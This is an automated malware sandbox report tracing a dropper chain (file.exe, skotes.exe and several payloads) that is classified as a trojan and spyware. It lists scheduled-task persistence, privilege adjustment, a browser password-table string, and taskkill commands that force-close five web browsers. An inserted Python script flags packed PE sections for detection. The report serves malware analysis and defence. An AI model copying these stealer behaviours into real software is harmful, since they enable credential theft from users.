Source: 2ada66c192.exe, 0000001E.00000002.2915748492.0000000000732000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_418b65b3-6
Source: 2ada66c192.exe, 0000002C.00000000.2906143455.0000000000732000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_7f544493-d
Source: 2ada66c192.exe, 0000002C.00000000.2906143455.0000000000732000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_7fab1405-2
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: ae5cfd188c.exe.6.dr Static PE information: section name:
Source: ae5cfd188c.exe.6.dr Static PE information: section name: .idata
Source: ae5cfd188c.exe.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: 37df924488.exe.6.dr Static PE information: section name:
Source: 37df924488.exe.6.dr Static PE information: section name: .idata
Source: 37df924488.exe.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: .idata
Source: 9c2827fca4.exe.6.dr Static PE information: section name:
Source: 9c2827fca4.exe.6.dr Static PE information: section name: .idata
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00ABCB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 6_2_00ABCB97
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DD5EB: CreateFileW,DeviceIoControl,CloseHandle, 11_2_006DD5EB
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006D1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 11_2_006D1201
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 11_2_006DE8F6
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A278BB 0_2_00A278BB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A28860 0_2_00A28860
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A27049 0_2_00A27049
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A231A8 0_2_00A231A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AF81D3 0_2_00AF81D3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AF8101 0_2_00AF8101
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009E4B30 0_2_009E4B30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009E4DE0 0_2_009E4DE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A22D10 0_2_00A22D10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A2779B 0_2_00A2779B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A17F36 0_2_00A17F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00AE78BB 1_2_00AE78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00AE8860 1_2_00AE8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00AE7049 1_2_00AE7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00AE31A8 1_2_00AE31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00AA4B30 1_2_00AA4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00AA4DE0 1_2_00AA4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00AE2D10 1_2_00AE2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00AE779B 1_2_00AE779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_00AD7F36 1_2_00AD7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00AE78BB 2_2_00AE78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00AE8860 2_2_00AE8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00AE7049 2_2_00AE7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00AE31A8 2_2_00AE31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00AA4B30 2_2_00AA4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00AA4DE0 2_2_00AA4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00AE2D10 2_2_00AE2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00AE779B 2_2_00AE779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_00AD7F36 2_2_00AD7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AAE530 6_2_00AAE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AC6192 6_2_00AC6192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AE8860 6_2_00AE8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AA4B30 6_2_00AA4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AA4DE0 6_2_00AA4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AE2D10 6_2_00AE2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AC0E13 6_2_00AC0E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AE7049 6_2_00AE7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AE31A8 6_2_00AE31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AC1602 6_2_00AC1602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AE779B 6_2_00AE779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AE78BB 6_2_00AE78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AC3DF1 6_2_00AC3DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00AD7F36 6_2_00AD7F36
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_0067BF40 11_2_0067BF40
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00678060 11_2_00678060
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E2046 11_2_006E2046
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006D8298 11_2_006D8298
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006AE4FF 11_2_006AE4FF
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006A676B 11_2_006A676B
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00704873 11_2_00704873
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_0067CAF0 11_2_0067CAF0
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_0069CAA0 11_2_0069CAA0
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_0068CC39 11_2_0068CC39
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006A6DD9 11_2_006A6DD9
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_0068D065 11_2_0068D065
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_0068B119 11_2_0068B119
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006791C0 11_2_006791C0
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00691394 11_2_00691394
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00691706 11_2_00691706
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_0069781B 11_2_0069781B
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_0068997D 11_2_0068997D
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00677920 11_2_00677920
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006919B0 11_2_006919B0
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00697A4A 11_2_00697A4A
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00691C77 11_2_00691C77
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00697CA7 11_2_00697CA7
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006FBE44 11_2_006FBE44
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006A9EEE 11_2_006A9EEE
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00691F32 11_2_00691F32
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe 1D95373C2284B657B614F07051EED5FED72F34F787350409E49E8DC30A5EA494
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe 9661D8306B9BF658642A01718AC746113E19741A560A48A5583BACD52998AF22
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe 2A68C5304DEEBB741759B134BE32D6C0F8E64DFBB8C06D9765E3035D3AF6CBFD
Source: C:\Users\user\Desktop\file.exe Code function: String function: 009F80C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: String function: 00690A30 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: String function: 0068F9F2 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00AB7A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00ABD64E appears 79 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00ABD663 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00ABD942 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00ABDF80 appears 81 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00AD8E10 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00AB80C0 appears 393 times
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: random[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.997627865484429
Source: random[1].exe.6.dr Static PE information: Section: xyjapqsh ZLIB complexity 0.9942076156859846
Source: ae5cfd188c.exe.6.dr Static PE information: Section: ZLIB complexity 0.997627865484429
Source: ae5cfd188c.exe.6.dr Static PE information: Section: xyjapqsh ZLIB complexity 0.9942076156859846
Source: random[1].exe0.6.dr Static PE information: Section: ipnqzgkg ZLIB complexity 0.9949173823395884
Source: 37df924488.exe.6.dr Static PE information: Section: ipnqzgkg ZLIB complexity 0.9949173823395884
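The static findings above (sections with blank or random-looking names such as xyjapqsh and ipnqzgkg, and raw data with ZLIB complexity above 0.99) are the classic signature of a packed or encrypted payload section. The following is an added example, not code from this report or from Joe Sandbox: it parses the PE section table directly from bytes and flags sections whose name is not a conventional one and whose contents barely compress. The sample image is constructed inline by build_sample_pe(); the 0.95 cut-off and the list of conventional names are assumptions.

```python
"""Flag packed-looking PE sections from the section table and zlib ratio."""
import random
import struct
import zlib

# Conventional section names (assumed list); anything else, including a blank
# name, counts as unusual.
KNOWN_NAMES = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
               ".reloc", ".bss", ".tls", ".pdata", ".CRT"}
COMPLEXITY_THRESHOLD = 0.95  # assumed cut-off; the report's values are 0.994-0.998


def zlib_complexity(data):
    """Compressed size divided by raw size; close to 1.0 means packed/encrypted."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def parse_sections(pe):
    """Yield (name, raw_bytes) for every IMAGE_SECTION_HEADER in the image."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4                                  # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + size_opt                         # first section header
    for i in range(num_sections):
        hdr = pe[table + 40 * i: table + 40 * (i + 1)]
        name = hdr[:8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", hdr, 16)
        yield name, pe[raw_ptr:raw_ptr + raw_size]


def suspicious_sections(pe):
    """Return [(name, complexity)] for sections with an odd name and packed data."""
    out = []
    for name, data in parse_sections(pe):
        c = zlib_complexity(data)
        if name not in KNOWN_NAMES and c > COMPLEXITY_THRESHOLD:
            out.append((name, round(c, 4)))
    return out


def build_sample_pe():
    """Constructed 32-bit PE: a compressible .text, a blank-named section of
    pseudo-random bytes and a high-entropy 'xyjapqsh'. Only the header fields
    the parser reads are populated; the seed makes the bytes reproducible."""
    rng = random.Random(1571971)
    sections = [
        (b".text", bytes([0x90]) * 4096),
        (b"", bytes(rng.getrandbits(8) for _ in range(4096))),
        (b"xyjapqsh", bytes(rng.getrandbits(8) for _ in range(4096))),
    ]
    e_lfanew, size_opt = 0x80, 224                       # IMAGE_OPTIONAL_HEADER32
    headers_len = e_lfanew + 4 + 20 + size_opt + 40 * len(sections)
    raw_ptr = (headers_len + 0x1FF) & ~0x1FF             # 512-byte file alignment
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_opt, 0x102)
    opt = struct.pack("<H", 0x10B).ljust(size_opt, b"\0")
    table, body = b"", b""
    for name, data in sections:
        table += (name.ljust(8, b"\0")
                  + struct.pack("<IIII", len(data), 0, len(data), raw_ptr + len(body))
                  + b"\0" * 16)
        body += data
    return (dos + b"PE\0\0" + coff + opt + table).ljust(raw_ptr, b"\0") + body


if __name__ == "__main__":
    for name, c in suspicious_sections(build_sample_pe()):
        print("packed-looking section %r complexity %.4f" % (name, c))
```

Run against a real dropped sample the same function applies unchanged to the file's bytes; the point of the combined check is that a high ratio alone also fires on legitimate .rsrc data (compressed images), so the name test keeps the alert rate down.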
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@85/20@28/14
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E37B5 GetLastError,FormatMessageW, 11_2_006E37B5
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006D10BF AdjustTokenPrivileges,CloseHandle, 11_2_006D10BF
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006D16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 11_2_006D16C3
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 11_2_006E51CD
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DD4DC CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 11_2_006DD4DC
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006E648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 11_2_006E648E
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006742A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 11_2_006742A2
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3300:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1700:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5796:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: ae5cfd188c.exe, 00000007.00000003.2497427727.0000000005624000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2498097741.0000000005600000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2631430591.0000000005420000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 55%
Source: 37df924488.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: ae5cfd188c.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe "C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe "C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe "C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe "C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe"
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
